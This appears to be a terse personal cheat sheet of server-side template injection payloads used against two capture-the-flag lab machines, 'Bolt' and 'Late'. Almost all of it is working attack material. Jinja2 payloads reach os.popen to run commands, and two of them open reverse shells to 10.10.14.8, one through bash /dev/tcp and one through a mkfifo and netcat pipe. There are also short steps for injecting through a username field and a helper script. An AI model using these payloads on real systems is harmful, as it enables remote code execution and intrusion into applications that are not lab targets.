SSTI

Payloads and notes

Bolt:

SSTI payload:
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.8/80 0>&1"').read() }}

demo.bolt.htb
update username with SSTI payload and read response from mail.bolt.htb
mail.bolt.htb login same with demo.bolt.htb

Late:

image.py
payload = """{{{{self._TemplateReference__context.namespace.__init__.__globals__.os.popen("{cmd}").read()}}}}"""
python3 image.py "id"
python3 image.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/f"